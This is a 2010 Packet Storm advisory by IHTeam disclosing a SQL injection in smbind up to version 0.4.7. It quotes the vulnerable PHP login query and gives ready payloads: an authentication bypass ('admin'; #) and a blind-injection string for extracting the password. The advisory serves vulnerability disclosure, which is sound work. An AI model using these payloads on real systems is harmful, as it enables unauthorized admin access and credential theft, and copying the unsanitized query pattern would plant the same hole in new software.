SMBind 0.4.7 SQL Injection

2010-09-03T00:00:00
ID PACKETSTORM:93486
Type packetstorm
Reporter IHTeam
Modified 2010-09-03T00:00:00

Description

                                        
                                            `##############################################################################################  
#  
# smbind <= v.0.4.7 Sql Injection  
# Site: https://sourceforge.net/projects/smbind/files/  
# Reported on 28/08/2010  
#  
# Author: IHTeam  
#  
##############################################################################################  
#  
# Buggy code:  
#  
if(isset($_POST['username']) && isset($_POST['password'])) {  
if((!filter("alphanum", $_POST['username'])) or (!filter("alphanum", $_POST['password']))) {  
die("Username and password must contain only letters and numbers.");  
}  
$_SESSION['username'] = $_POST['username'];  
$_SESSION['password'] = $_POST['password'];  
}  
  
if(isset($_SESSION['username']) && isset($_SESSION['password'])) {  
$res = $dbconnect->query("SELECT ID FROM users WHERE username = '" . $_SESSION['username'] ."' AND password = '" . md5($_SESSION['password']) . " ' ");  
#  
##############################################################################################  
#  
# Easy admin login  
#  
# Enter in username field: admin'; #  
# Enter in password field: [anything]  
#  
# Sql query will result like this: SELECT ID FROM users WHERE username = 'admin'; #' AND password = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'  
#  
##############################################################################################  
#  
# Limitation and Blind Sql Injection  
#  
# You're able to make blind sql injection too. Just input in username field something like this:  
# admin' AND SUBSTRING(password,1,1)=char(49); #  
#  
# That sql injection work only with magic_quote_gpc = Off  
#  
##############################################################################################  
  
`